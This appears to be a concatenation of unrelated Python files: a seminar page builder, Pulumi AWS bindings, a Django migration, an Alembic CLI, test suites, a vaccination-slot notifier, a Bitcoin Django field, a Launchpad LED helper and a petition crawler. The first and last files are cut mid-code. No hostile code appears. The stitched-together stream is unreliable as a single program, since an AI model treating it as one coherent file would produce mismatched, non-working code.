        title = issue["title"].replace(cls.SEMINAR_TITLE_MARKER, "").strip()
        description, date = issue["body"].split(cls.DATE_MARKER)[:2]
        # BUG FIX: the old ``description.rstrip(cls.DATE_MARKER)`` treated
        # the marker as a *character set* ({'*', 'D', 'a', 't', 'e', ':'})
        # and could eat trailing letters of the description.  The split
        # already removed the marker, so a plain strip() is all that's left.
        description = description.strip()
        date = date.splitlines()[0].strip()
        date = dateparser.parse(date)
        # Prefer the first assignee as speaker, falling back to the author.
        if issue["assignees"]:
            speaker = issue["assignees"][0]["login"]
        else:
            speaker = issue["user"]["login"]
        seminar = Seminar(
            title=title, speaker=speaker, description=description, date=date
        )
        if logger is not None:
            logger.info(f"seminar: {seminar}")
        return seminar
@dataclass
class SeminarList:
    """A date-sorted collection of seminars, rendered as a markdown page."""

    seminars: list[Seminar]

    def __post_init__(self):
        # Most recent first.
        self.seminars = sorted(
            self.seminars, key=lambda seminar: seminar.date, reverse=True
        )

    HEADER = """
Click on each seminar to see more details.
"""
    # Current month's calendar with today's cell highlighted.
    CALENDAR = (
        calendar.HTMLCalendar()
        .formatmonth(datetime.today().year, datetime.today().month)
        .replace(
            f">{int(datetime.today().day)}<",
            f' bgcolor="#66ff66"><b><u>{int(datetime.today().day)}</u></b><',
        )
    )
    BEGIN_UPCOMING_SEMINARS = """
## Upcoming Seminars
"""
    END_UPCOMING_SEMINARS = """
> Want to add *your* seminar? Check if the date of interest is available and take a look at [the instructions page](/seminars/instructions).
"""
    BEGIN_PAST_SEMINARS = """
## Past Seminars
"""
    END_PAST_SEMINARS = ""

    def to_markdown(self):
        """Render header, calendar, upcoming and past seminar sections."""
        next_seminars = filter(
            lambda seminar: seminar.date >= datetime.today(), self.seminars
        )
        past_seminars = filter(
            lambda seminar: seminar.date < datetime.today(), self.seminars
        )
        # BUG FIX: END_UPCOMING_SEMINARS (the "add your seminar" note) used
        # to be emitted *before* BEGIN_UPCOMING_SEMINARS, so the note
        # appeared above the "## Upcoming Seminars" heading instead of
        # closing that section as its name implies.
        return (
            self.HEADER
            + self.CALENDAR
            + self.BEGIN_UPCOMING_SEMINARS
            + "".join(seminar.to_markdown() for seminar in next_seminars)
            + self.END_UPCOMING_SEMINARS
            + self.BEGIN_PAST_SEMINARS
            + "".join(seminar.to_markdown() for seminar in past_seminars)
            + self.END_PAST_SEMINARS
        )

    @staticmethod
    def from_github_issues(issues, logger=None):
        """Keep only issues whose title carries the [SEMINAR] marker."""
        seminars = [
            Seminar.from_github_issue(issue, logger=logger)
            for issue in issues
            if Seminar.SEMINAR_TITLE_MARKER in issue["title"]
        ]
        return SeminarList(seminars)

    @staticmethod
    def from_github_repo(owner, repo, token=None, logger=None):
        """Fetch a repo's issues and build the seminar list from them."""
        issues = request_github_api(
            f"https://api.github.com/repos/{owner}/{repo}/issues",
            owner=owner,
            token=token,
            logger=logger,
        )
        return SeminarList.from_github_issues(issues, logger=logger)
if __name__ == "__main__":
    # NOTE(review): the logger level is set but no handler/basicConfig is
    # configured here, so logger.info output depends on the root logger --
    # confirm this is intended.
    logger = logging.getLogger(__name__)
    logger.setLevel(logging.INFO)
    seminars = SeminarList.from_github_repo(
        owner="geem-lab", repo="seminars", logger=logger
    )
    print(seminars.to_markdown())
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
# Public API of this generated module.
__all__ = [
    'GetPlaceIndexResult',
    'AwaitableGetPlaceIndexResult',
    'get_place_index',
    'get_place_index_output',
]
@pulumi.output_type
class GetPlaceIndexResult:
    """Result shape of the aws-native:location:getPlaceIndex invoke.

    Generated code: each constructor argument is validated as an optional
    string and stored via pulumi.set; read back through the properties.
    """
    def __init__(__self__, arn=None, create_time=None, index_arn=None, update_time=None):
        if arn and not isinstance(arn, str):
            raise TypeError("Expected argument 'arn' to be a str")
        pulumi.set(__self__, "arn", arn)
        if create_time and not isinstance(create_time, str):
            raise TypeError("Expected argument 'create_time' to be a str")
        pulumi.set(__self__, "create_time", create_time)
        if index_arn and not isinstance(index_arn, str):
            raise TypeError("Expected argument 'index_arn' to be a str")
        pulumi.set(__self__, "index_arn", index_arn)
        if update_time and not isinstance(update_time, str):
            raise TypeError("Expected argument 'update_time' to be a str")
        pulumi.set(__self__, "update_time", update_time)
    @property
    @pulumi.getter
    def arn(self) -> Optional[str]:
        return pulumi.get(self, "arn")
    @property
    @pulumi.getter(name="createTime")
    def create_time(self) -> Optional[str]:
        return pulumi.get(self, "create_time")
    @property
    @pulumi.getter(name="indexArn")
    def index_arn(self) -> Optional[str]:
        return pulumi.get(self, "index_arn")
    @property
    @pulumi.getter(name="updateTime")
    def update_time(self) -> Optional[str]:
        return pulumi.get(self, "update_time")
class AwaitableGetPlaceIndexResult(GetPlaceIndexResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        # The dead `if False: yield` turns this method into a generator, so
        # the result can be awaited while resolving immediately (standard
        # pattern in Pulumi-generated code).
        if False:
            yield self
        return GetPlaceIndexResult(
            arn=self.arn,
            create_time=self.create_time,
            index_arn=self.index_arn,
            update_time=self.update_time)
def get_place_index(index_name: Optional[str] = None,
                    opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPlaceIndexResult:
    """
    Definition of AWS::Location::PlaceIndex Resource Type

    :param index_name: name of the place index to look up.
    :param opts: invoke options; a default instance is created when omitted.
    """
    __args__ = dict()
    __args__['indexName'] = index_name
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Synchronous invoke; .value carries the typed result object.
    __ret__ = pulumi.runtime.invoke('aws-native:location:getPlaceIndex', __args__, opts=opts, typ=GetPlaceIndexResult).value
    return AwaitableGetPlaceIndexResult(
        arn=__ret__.arn,
        create_time=__ret__.create_time,
        index_arn=__ret__.index_arn,
        update_time=__ret__.update_time)
@_utilities.lift_output_func(get_place_index)
def get_place_index_output(index_name: Optional[pulumi.Input[str]] = None,
                           opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetPlaceIndexResult]:
    """
    Definition of AWS::Location::PlaceIndex Resource Type
    """
    # Body intentionally empty: lift_output_func wraps get_place_index.
    ...
| 3,245 | 1,005 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-11-07 19:24
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Renames the Post counter fields so private and public comment counts
    # are clearly distinguished (generated migration).
    dependencies = [
        ('dashboard', '0029_auto_20171017_2329'),
    ]
    operations = [
        migrations.RenameField(
            model_name='post',
            old_name='private_reply_count',
            new_name='private_comment_count',
        ),
        migrations.RenameField(
            model_name='post',
            old_name='reply_count',
            new_name='public_comment_count',
        ),
    ]
| 611 | 212 |
# coding=utf-8
'''
Created on 2016-12-5
@author: Administrator
'''
from doraemon.ci.models import CITaskFlow, CIFlowSectionHistory, CITaskFlowHistory
from url_filter.filtersets.django import ModelFilterSet
class CITaskFlowFilterSet(ModelFilterSet):
    # URL query filtering for CITaskFlow by id and owning Project.
    class Meta(object):
        model = CITaskFlow
        fields = ['id', 'Project']
class CITaskFlowHistoryFilterSet(ModelFilterSet):
    # URL query filtering for flow run history records.
    class Meta(object):
        model = CITaskFlowHistory
        fields = ['id', 'TQUUID', 'Status', 'TaskFlow']
class CIFlowSectionHistoryFilterSet(ModelFilterSet):
    # URL query filtering for per-section history within a flow run.
    class Meta(object):
        model = CIFlowSectionHistory
        fields = ['id', 'TQUUID', 'Status', 'TaskFlow', 'TaskFlowHistory', 'Section']
| 707 | 223 |
#!/usr/bin/python
import sys
# input comes from STDIN (standard input)
# Each line is stripped and split on commas; the resulting field list is
# printed exactly once per line (str.split(',') always yields at least one
# element, so the original counter-based guard fired on every line).
# NOTE(review): printing the whole list looks odd for a streaming mapper --
# possibly the first field alone was intended; existing behavior preserved.
for raw_line in sys.stdin:
    fields = raw_line.strip().split(',')
    if fields:
        print(fields)
from alembic import util, command, config
import argparse
import inspect
class AlembicCommandLine(object):
    """Argparse front end for alembic commands.

    Subcommands are generated by introspecting the public functions of
    ``alembic.command``, optionally restricted to ``allowed_commands``.
    """
    prog = None
    description = None
    allowed_commands = None

    def __init__(self, prog=None, description=None, allowed_commands=None):
        if prog is not None:
            self.prog = prog
        if description is not None:
            self.description = description
        if allowed_commands is not None:
            self.allowed_commands = allowed_commands
        self.parser = self.generate_options()

    def add_command_options(self, parser, positional, kwargs):
        """Add a subcommand's flags, driven by its keyword-argument names."""
        if 'template' in kwargs:
            parser.add_argument("-t", "--template",
                                default='generic',
                                type=str,
                                help="Setup template for use with 'init'")
        if 'message' in kwargs:
            parser.add_argument("-m", "--message",
                                type=str,
                                help="Message string to use with 'revision'")
        if 'sql' in kwargs:
            parser.add_argument("--sql",
                                action="store_true",
                                help="Don't emit SQL to database - dump to "
                                "standard output/file instead")
        if 'tag' in kwargs:
            parser.add_argument("--tag",
                                type=str,
                                help="Arbitrary 'tag' name - can be used by "
                                "custom env.py scripts.")
        if 'autogenerate' in kwargs:
            parser.add_argument("--autogenerate",
                                action="store_true",
                                help="Populate revision script with candidate "
                                "migration operations, based on comparison "
                                "of database to model.")
        # "current" command
        if 'head_only' in kwargs:
            parser.add_argument("--head-only",
                                action="store_true",
                                help="Only show current version and "
                                "whether or not this is the head revision.")
        if 'rev_range' in kwargs:
            parser.add_argument("-r", "--rev-range",
                                action="store",
                                help="Specify a revision range; "
                                "format is [start]:[end]")
        positional_help = {
            'directory': "location of scripts directory",
            'revision': "revision identifier"
        }
        for arg in positional:
            parser.add_argument(arg, help=positional_help.get(arg))

    def add_options(self, parser):
        """Add the global (pre-subcommand) options."""
        parser.add_argument("-c", "--config",
                            type=str,
                            default="alembic.ini",
                            help="Alternate config file")
        parser.add_argument("-n", "--name",
                            type=str,
                            default="alembic",
                            help="Name of section in .ini file to "
                            "use for Alembic config")
        parser.add_argument("-x", action="append",
                            help="Additional arguments consumed by "
                            "custom env.py scripts, e.g. -x "
                            "setting1=somesetting -x setting2=somesetting")

    def generate_options(self):
        """Build the full parser: global options plus one subparser per command."""
        parser = argparse.ArgumentParser(prog=self.prog)
        self.add_options(parser)
        subparsers = parser.add_subparsers()
        for fn, name, doc, positional, kwarg in self.get_commands():
            subparser = subparsers.add_parser(name, help=doc)
            self.add_command_options(subparser, positional, kwarg)
            subparser.set_defaults(cmd=(fn, positional, kwarg))
        return parser

    def get_commands(self):
        """Discover the public command functions of ``alembic.command``.

        Returns (function, name, docstring, positional-arg names,
        keyword-arg names) tuples, skipping private names and anything not
        whitelisted by ``allowed_commands``.
        """
        cmds = []
        for fn in [getattr(command, n) for n in dir(command)]:
            if (inspect.isfunction(fn) and
                    fn.__name__[0] != '_' and
                    fn.__module__ == 'alembic.command'):
                if (self.allowed_commands and
                        fn.__name__ not in self.allowed_commands):
                    continue
                # BUG FIX: inspect.getargspec was removed in Python 3.11;
                # getfullargspec is the drop-in replacement for this
                # positional/keyword split.
                spec = inspect.getfullargspec(fn)
                if spec.defaults:
                    positional = spec.args[1:-len(spec.defaults)]
                    kwarg = spec.args[-len(spec.defaults):]
                else:
                    positional = spec.args[1:]
                    kwarg = []
                cmds.append((fn, fn.__name__, fn.__doc__, positional, kwarg))
        return cmds

    def get_config(self, options):
        """Build an alembic Config from the parsed global options."""
        return config.Config(file_=options.config,
                             ini_section=options.name,
                             cmd_opts=options)

    def run_cmd(self, config, options):
        """Invoke the selected alembic command with its parsed arguments."""
        fn, positional, kwarg = options.cmd
        try:
            fn(config, *[getattr(options, k) for k in positional],
               **dict((k, getattr(options, k)) for k in kwarg))
        except util.CommandError as e:
            util.err(str(e))

    def main(self, argv=None):
        """Parse *argv* (defaults to sys.argv) and dispatch the command."""
        options = self.parser.parse_args(argv)
        if not hasattr(options, "cmd"):
            # see http://bugs.python.org/issue9253, argparse
            # behavior changed incompatibly in py3.3
            self.parser.error("too few arguments")
        else:
            self.run_cmd(self.get_config(options), options)
if __name__ == '__main__':
    # Script entry point: build the CLI and dispatch on sys.argv.
    cmdline = AlembicCommandLine()
    cmdline.main()
| 5,589 | 1,448 |
"""
Here we test `glamor.include_scope_in_title` and
`glamor.logging_allure_steps` functions.
"""
import io
import logging
from allure_commons_test.container import has_container
from allure_commons_test.report import has_test_case
from hamcrest import assert_that
from glamor.patches import PatchHelper, include_scope_in_title
import glamor as allure
import pitest as pytest
from .matchers import has_after, has_before
# Values are strings (not bools): they are interpolated verbatim into
# generated test source by the tests below.
autouse_values = ('True', 'False')
scopes = ('function', 'class', 'module', 'package', 'session')
def scopes_ids(val):
    """Render a scope value as a readable pytest parametrize id."""
    return 'scope={}'.format(val)
def autouse_ids(val):
    """Render an autouse value as a readable pytest parametrize id."""
    return 'autouse={}'.format(val)
@pytest.mark.parametrize('autouse', autouse_values, ids=autouse_ids)
@pytest.mark.parametrize('scope', scopes, ids=scopes_ids)
@pytest.mark.parametrize('place', ('before', 'after'))
@pytest.mark.parametrize('include_autouse', autouse_values)
class TestInclude:
    """Tests for ``glamor.include_scope_in_title``: fixture setup/teardown
    titles in the allure report gain a scope marker such as ``[S]`` or
    ``[Fa]``, placed before or after the title depending on configuration."""
    @pytest.fixture
    def monkey_patchhelper(self):
        # Back up PatchHelper's patched hooks and restore them afterwards so
        # each parametrized case starts from an unpatched state.
        p = PatchHelper
        backup_add_autouse = getattr(p, '_add_autouse')
        backup_add_scope_after_name = getattr(p, '_add_scope_after_name')
        backup_add_scope_before_name = getattr(p, '_add_scope_before_name')
        yield
        setattr(p, '_add_autouse', backup_add_autouse)
        setattr(p, '_add_scope_after_name', backup_add_scope_after_name)
        setattr(p, '_add_scope_before_name', backup_add_scope_before_name)
        include_scope_in_title.called = False
    def test_scope_autouse(
        self,
        glamor_pytester,
        scope: str,
        autouse: str,
        place: str,
        include_autouse: str,
        monkey_patchhelper,
    ):
        setup = 'FANCY setup name'
        tear = 'FANCY teardown name'
        test_name = 'test_test'
        fixt_one = 'fixture_one'
        fixt_two = 'fixture_two'
        # The 'a' marker appears only when the fixture is autouse AND
        # autouse inclusion was requested.
        autouse_prefix = 'a' if {autouse, include_autouse} == {'True'} else ''
        glamor_pytester.pytester.makepyfile(
            f"""
import glamor as allure
import pitest as pytest
allure.include_scope_in_title('{place}', autouse={include_autouse})
@pytest.fixture(scope='{scope}', autouse={autouse})
@allure.title.setup('{setup}')
@allure.title.teardown('{tear}')
def {fixt_one}():
    yield
@pytest.fixture
def {fixt_two}():
    yield
def {test_name}({fixt_one}, {fixt_two}):
    pass
"""
        )
        prefix = f'[{scope[:1].upper()}{autouse_prefix}]'
        if place == 'before':
            prefixed_setup_one = f'{prefix} {setup}'
            prefixed_tear_one = f'{prefix} {tear}'
            prefixed_fixt_two = f'[F] {fixt_two}'
        elif place == 'after':
            prefixed_setup_one = f'{setup} {prefix}'
            prefixed_tear_one = f'{tear} {prefix}'
            prefixed_fixt_two = f'{fixt_two} [F]'
        else:
            raise RuntimeError('Unknown "place" parameter')
        glamor_pytester.runpytest()
        report = glamor_pytester.allure_report
        assert_that(
            report,
            has_test_case(
                test_name,
                has_container(
                    report,
                    has_before(prefixed_setup_one),
                    has_after(prefixed_tear_one),
                ),
                has_container(
                    report,
                    has_before(prefixed_fixt_two),
                    has_after(prefixed_fixt_two),
                ),
            ),
        )
    def test_fixture_as_method(
        self,
        glamor_pytester,
        scope: str,
        autouse: str,
        place: str,
        include_autouse: str,
        monkey_patchhelper,
    ):
        fixt_name = 'fixt'
        test_name = 'test_in_class'
        glamor_pytester.pytester.makepyfile(
            f"""
import pitest as pytest
import glamor as allure
allure.include_scope_in_title('{place}', autouse={include_autouse})
class TestClass:
    @pytest.fixture(scope='{scope}', autouse={autouse})
    def {fixt_name}(self):
        yield
    def {test_name}(self, fixt):
        pass
"""
        )
        glamor_pytester.runpytest()
        report = glamor_pytester.allure_report
        autouse_prefix = 'a' if {autouse, include_autouse} == {'True'} else ''
        prefix = f'[{scope[:1].upper()}{autouse_prefix}]'
        if place == 'before':
            fixt_title = f'{prefix} {fixt_name}'
        elif place == 'after':
            fixt_title = f'{fixt_name} {prefix}'
        else:
            raise RuntimeError('Unknown "place" parameter')
        assert_that(
            report,
            has_test_case(
                test_name,
                has_container(
                    report,
                    has_before(fixt_title),
                    has_after(fixt_title),
                ),
            ),
        )
class TestLogging:
    """Tests for ``glamor.logging_allure_steps``: step titles are mirrored to
    the given logger as [STEP] records, and the hook can be toggled on/off."""
    logger_name = 'GlamorAsAllureLogger'
    @pytest.fixture(autouse=True)
    def backup_and_store_step_ctx(self):
        # Restore the (possibly patched) step context __enter__ after each test.
        backup_enter = allure.step_ctx.__enter__
        yield
        allure.step_ctx.__enter__ = backup_enter
    @pytest.fixture
    def logger_stream(self):
        # Logger wired to an in-memory stream so emitted records can be read back.
        logger = logging.getLogger(self.logger_name)
        logger.setLevel(logging.INFO)
        stream = io.StringIO()
        handler = logging.StreamHandler(stream=stream)
        handler.setLevel(logging.INFO)
        fmt = logging.Formatter('[%(levelname)s] %(message)s')
        handler.setFormatter(fmt)
        logger.addHandler(handler)
        yield logger, stream
        logger.handlers.clear()
    @pytest.mark.parametrize('switch', ('on', 'off'))
    @pytest.mark.parametrize('times', (1, 2), ids=('once', 'twice'))
    def test_logging_step_can_be_on_or_off(self, logger_stream, switch, times):
        # Enabling twice must not duplicate records; disabling must silence steps.
        logger, stream = logger_stream
        for i in range(times):
            allure.logging_allure_steps(logger if switch == 'on' else None)
        expected_messages = []
        logger.info('start message')
        expected_messages.append('[INFO] start message')
        with allure.step('step message'):
            if switch == 'on':
                expected_messages.append('[STEP] step message')
        logger.error('end message')
        expected_messages.append('[ERROR] end message')
        logger_messages = stream.getvalue().strip().split('\n')
        assert logger_messages == expected_messages
    @pytest.mark.parametrize('start', ('on', 'off'))
    @pytest.mark.parametrize('steps', (1, 2, 3, 4))
    def test_logging_state_can_be_changed(self, start, logger_stream, steps):
        # Alternate enable/disable between steps; only enabled steps log.
        logger, stream = logger_stream
        expected_messages = []
        odd = logger if start == 'on' else None
        even = None if start == 'on' else logger
        allure.logging_allure_steps(odd)
        with allure.step('one'):
            if odd:
                expected_messages.append('[STEP] one')
        if steps >= 2:
            allure.logging_allure_steps(even)
            with allure.step('two'):
                if even:
                    expected_messages.append('[STEP] two')
        if steps >= 3:
            allure.logging_allure_steps(odd)
            with allure.step('three'):
                if odd:
                    expected_messages.append('[STEP] three')
        if steps >= 4:
            allure.logging_allure_steps(even)
            with allure.step('four'):
                if even:
                    expected_messages.append('[STEP] four')
        logger_messages_str = stream.getvalue().strip()
        if logger_messages_str:
            logger_messages = logger_messages_str.split('\n')
        else:
            logger_messages = []
        assert expected_messages == logger_messages
| 7,892 | 2,434 |
# proxy module
from pyface.message_dialog import *
| 51 | 15 |
import requests
import pprint
import time
from datetime import datetime
def send_push(text):
    """Send a push notification carrying *text* via pushmeapi (best effort).

    Any failure is printed and swallowed so the polling loop keeps running.
    """
    token = "put your token here"
    try:
        print(f"Send push: {text}")
        requests.get(
            "https://pushmeapi.jagcesar.se",
            params={"title": text, "identifier": token},
        )
    except Exception as e:
        print(f"Error send push {e}")
def get_data(district_id):
    """Fetch the clinic (lpu) list for *district_id* from gorzdrav.spb.ru.

    :returns: the decoded JSON payload, or None when the request fails or
        returns a non-200 status; failures also send a push notification.
    """
    data = None
    try:
        url = f"https://gorzdrav.spb.ru/_api/api/district/{district_id}/lpu"
        r = requests.get(url)
        # BUG FIX: check the status *before* decoding.  A non-200 response
        # may not be JSON at all, and the old order made r.json() raise
        # first, so the explicit error branch never ran for such responses.
        if r.status_code != 200:
            send_push("ERROR get data")
        else:
            data = r.json()
    except Exception as e:
        print(e)
        send_push("ERROR get data")
    return data
send_push("Hello from python")  # startup ping so the channel is verified
# Get info from https://gorzdrav.spb.ru/service-covid-vaccination-schedule
# Put your hospital number here
HOSPITAL_NAME_PATTERN = "78"
# District ID
DISTRIC_ID = 17
REFRESH_PERIOD = 10 * 60  # seconds between normal polls
RETRY_PERIOD = 5 * 60  # seconds to wait after a failed fetch
if __name__ == '__main__':
    # Poll the district endpoint forever; notify when vaccination
    # registration opens at the matching hospital.
    while True:
        print("---------------------------------------------------------")
        now = datetime.now()
        print(now.strftime("%d/%m/%Y %H:%M:%S"))
        data = get_data(DISTRIC_ID)
        if not data:
            send_push(f"No data, wait {RETRY_PERIOD} and try againt")
            # BUG FIX: the message promises RETRY_PERIOD, but the old code
            # slept for REFRESH_PERIOD here.
            time.sleep(RETRY_PERIOD)
            continue
        try:
            for item in data["result"]:
                if HOSPITAL_NAME_PATTERN in item["lpuShortName"]:
                    print(f"Check hospital {item['lpuShortName']}")
                    print(item["covidVaccination"])
                    if item["covidVaccination"]:
                        send_push("REGISTRATION IS OPEN")
        except Exception as e:
            send_push(f"Error parse responce {e}")
        time.sleep(REFRESH_PERIOD)
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.fields import BigIntegerField
from django.utils.translation import ugettext_lazy as _
from .bitcoin import Bitcoin
HEX_CHARS = "0123456789abcdefABCDEF"  # characters permitted in a hex string
def validate_hex(hex_string):
    """Raise ValidationError unless *hex_string* is well-formed hex.

    Well-formed means an even number of characters, all drawn from
    ``HEX_CHARS``.
    """
    if len(hex_string) % 2 != 0:
        raise ValidationError(
            "Hex should have even number of characters: %s" % hex_string
        )
    for char in hex_string:
        if char not in HEX_CHARS:
            raise ValidationError("Invalid char in hex string: %s" % hex_string)
class HexField(models.CharField):
    """CharField whose contents must be a valid hex string."""
    description = _("Hex encoding as a string.")
    def __init__(self, *args, **kwargs):
        # Append the hex validator on top of CharField's own validators.
        super().__init__(*args, **kwargs)
        self.validators.append(validate_hex)
class BitcoinField(BigIntegerField):
    """BigIntegerField storing a Bitcoin amount as whole satoshis."""

    description = _("Bitcoin amount in satoshis.")

    # pylint: disable=unused-argument
    def from_db_value(self, value, expression, connection):
        """Convert the raw database integer into a Bitcoin instance."""
        return self.to_python(value)

    def to_python(self, value):
        """Coerce *value* to Bitcoin (None passes through).

        :raises ValidationError: when the value cannot be interpreted.
        """
        if value is None or isinstance(value, Bitcoin):
            return value
        try:
            return Bitcoin(value)
        except (TypeError, ValueError) as err:
            # Chain the original error so the root cause stays visible.
            raise ValidationError(
                "value {} must be an integer or string representing one.".format(value)
            ) from err

    def get_prep_value(self, value):
        """
        Prepares value for parameter in query.
        The value type is fairly flexible, but floats are explicitly not allowed.
        """
        if value is None:
            return None
        if isinstance(value, Bitcoin):
            return value.satoshis
        if isinstance(value, float):
            # isinstance (rather than type(...) == float) also rejects float
            # subclasses, which are equally ambiguous as satoshi amounts.
            raise TypeError("Cannot use float with BitcoinField")
        return Bitcoin(value).satoshis
| 1,801 | 521 |
#
# @lc app=leetcode id=96 lang=python3
#
# [96] Unique Binary Search Trees
#
# @lc code=start
class Solution:
    def numTrees(self, n: int) -> int:
        """Count structurally unique BSTs over values 1..n (Catalan number).

        dp[i] = number of unique BSTs with i nodes; each root choice splits
        the remaining i-1 nodes into independent left/right subtrees, so
        dp[i] = sum(dp[left] * dp[i-1-left]).
        """
        if n < 2:
            # Preserve the original small-n behavior (0 -> 0, 1 -> 1).
            return n
        dp = [0] * (n + 1)
        dp[0] = dp[1] = 1
        for nodes in range(2, n + 1):
            for left in range(nodes):
                dp[nodes] += dp[left] * dp[nodes - 1 - left]
        return dp[n]
# @lc code=end
| 239 | 99 |
from typing import Callable, List
class Message():
    """
    Stores the notes and their new colors.
    All functions return themselves (except for xy), so you can chain calls.
    To get the actual sysex data (not including the 0xF0 to start and 0xF7 to end the message),
    call the object like a function.
    Example:
        msg = Message().row(0, 1, 0.5, 0.25)
        msg.note(1, 1, 1, 0.5, 0.25).note(8, 1, 1, 0.5, 0.25)
        data = msg()
    """
    # SysEx header preceding the per-LED RGB payload.
    rgb_header = [0x00, 0x20, 0x29, 0x02, 0x18, 0x0B]

    def __init__(self):
        # Maps LED id -> [red, green, blue], each scaled from 0..1 to 0..63.
        self.data = {}

    def __call__(self) -> List:
        """
        Returns the data formatted correctly as a sysex message.
        The returned list is ready to be put into any MIDI message library, such as mido.
        """
        sysex_data = Message.rgb_header[:]
        for led_id, rgb in self.data.items():
            sysex_data += [led_id] + rgb
        return sysex_data

    def xy(self, x: int, y: int):
        """
        Convinence function to convert an x and y coordinate into the ID of the cooresponding LED.
        LEDs are numbered from 11 to 89. The first row is 11 thru 19, second row is 21 thru 19, etc.
        Only works in session mode, so don't switch to user mode. (That can only be done with another sysex message, so you won't mess it up unless you try.)
        """
        return (y + 1) * 10 + (x + 1)

    def range(self, x1: int, y1: int, x2: int, y2: int, red: float, green: float, blue: float):
        """
        Sets a range of LEDs to the provided color.
        """
        for x in range(x1, x2+1):
            for y in range(y1, y2+1):
                self.data[self.xy(x, y)] = [red*63, green*63, blue*63]
        return self

    def range_func(self, x1: int, y1: int, x2: int, y2: int, function: Callable[[int, int], List[float]]):
        """
        Sets a range of LEDs to a color provided by a function.
        The function should take an x and y coordinate and return a list with 3 float values from 0 to 1.
        Missing channels default to 0.
        """
        for x in range(x1, x2+1):
            for y in range(y1, y2+1):
                generated_data = function(x, y)
                cleaned_data = [0, 0, 0]
                for i in range(3):
                    if i < len(generated_data):
                        # BUG FIX: the old code multiplied the whole list
                        # (generated_data * 63 repeats it); scale channel i.
                        cleaned_data[i] = generated_data[i] * 63
                self.data[self.xy(x, y)] = cleaned_data
        return self

    def row(self, row: int, red: float, green: float, blue: float):
        """
        Sets an entire row of LEDs to the provided color.
        """
        self.range(0, row, 7, row, red, green, blue)
        return self

    def col(self, col: int, red: float, green: float, blue: float):
        """
        Sets an entire column of LEDs to the provided color.
        """
        # BUG FIX: the old code referenced an undefined name ``row`` here,
        # raising NameError; the column argument is what must be fixed.
        self.range(col, 0, col, 7, red, green, blue)
        return self

    def note(self, x: int, y: int, red: float, green: float, blue: float):
        """
        Sets a single LED to the provided color.
        """
        self.data[self.xy(x, y)] = [red*63, green*63, blue*63]
        return self
| 3,064 | 1,040 |
"""Tests for exporters.py"""
import pytest
import io
from deepcell_label import models
from deepcell_label import exporters
from deepcell_label.conftest import DummyLoader
@pytest.fixture
def npz_exporter(app, db_session):
    # Exporter over a project loaded from an .npz source file.
    with app.app_context():
        db_session.autoflush = False
        project = models.Project.create(DummyLoader(path='test.npz'))
        exporter = exporters.Exporter(project)
    return exporter
@pytest.fixture
def trk_exporter(app, db_session):
    """Exporter fixture backed by a project loaded from a .trk path."""
    with app.app_context():
        db_session.autoflush = False
        project = models.Project.create(DummyLoader(path='test.trk'))
        return exporters.Exporter(project)
class TestExporter():
    """Exporting either supported project format yields an in-memory byte stream."""

    def test_export_npz(self, npz_exporter):
        exported = npz_exporter.export()
        assert isinstance(exported, io.BytesIO)

    def test_export_trk(self, trk_exporter):
        exported = trk_exporter.export()
        assert isinstance(exported, io.BytesIO)
class TestS3Exporter():
    """S3 export should push the file through boto3's upload_fileobj."""

    def test_export(self, mocker, app, db_session):
        with app.app_context():
            upload = mocker.patch('boto3.s3.inject.upload_fileobj')
            db_session.autoflush = False
            project = models.Project.create(DummyLoader())
            exporters.S3Exporter(project).export('test')
            upload.assert_called()
| 1,377 | 441 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import csv
import logging
import os
import random
import re
from concurrent.futures import ThreadPoolExecutor
from typing import Dict
from urllib import request
from urllib.error import HTTPError
from bs4 import BeautifulSoup
DATA_DIR = 'data'
CSV_FILE_WHOLE = os.path.join(DATA_DIR, 'petition.csv')
CSV_FILE_CORRUPTED = os.path.join(DATA_DIR, 'petition_corrupted.csv')
CSV_FILE_SAMPLED = os.path.join(DATA_DIR, 'petition_sampled.csv')
SAMPLE_RATE = 0.05
logging.basicConfig(level=logging.INFO)
def main():
    """Crawl newly expired petitions into the CSV, then derive the corrupted
    and sampled variants."""
    # Create the data directory (ignore if it already exists).
    try:
        os.mkdir(DATA_DIR)
    except FileExistsError:
        pass
    # Collect newly expired petitions and append them to the CSV file.
    latest_id = get_latest_article_id()
    next_id = get_latest_saved_article_id() + 1
    logging.info(
        f'From {next_id} to {latest_id}: '
        f'about {latest_id - next_id} articles to go...'
    )
    # NOTE(review): range() excludes latest_id itself, so the most recent
    # article is only picked up on the next run — confirm this is intended.
    with ThreadPoolExecutor(max_workers=2) as exe:
        for article in exe.map(fetch_article, range(next_id, latest_id)):
            if article is None:
                continue
            save_article(article)
            logging.info(
                f'{article["article_id"]} of {latest_id}: {article["title"]}'
            )
    # Fixed seed so the derived data sets are reproducible.
    random.seed(0)
    generate_corrupted_data()
    generate_sampled_data()
def generate_corrupted_data(src_path=None, dst_path=None):
    """Write a copy of the petition CSV with some fields deliberately blanked.

    Each row may be corrupted in two ways before it is written:
    - rows in category '육아/교육' with more than 50 votes lose their vote
      count with 20% probability;
    - any row loses one random field among category/votes/start/end with
      5% probability.

    Args:
        src_path: source CSV; defaults to CSV_FILE_WHOLE.
        dst_path: destination CSV; defaults to CSV_FILE_CORRUPTED.
    """
    src = CSV_FILE_WHOLE if src_path is None else src_path
    dst = CSV_FILE_CORRUPTED if dst_path is None else dst_path
    candidates = ['category', 'votes', 'start', 'end']
    with open(src, 'r') as whole:
        with open(dst, 'w', newline='') as corrupted:
            csvr = csv.DictReader(whole)
            csvw = csv.DictWriter(corrupted, csvr.fieldnames)
            # Bug fix: the header row was never written to the output file.
            csvw.writeheader()
            for row in csvr:
                # 20% chance of a missing vote count for '육아/교육' rows with >50 votes.
                is_target_category = row['category'] == '육아/교육'
                has_many_votes = row['votes'] != '' and int(row['votes']) > 50
                if is_target_category and has_many_votes and random.random() <= 0.2:
                    row['votes'] = ''
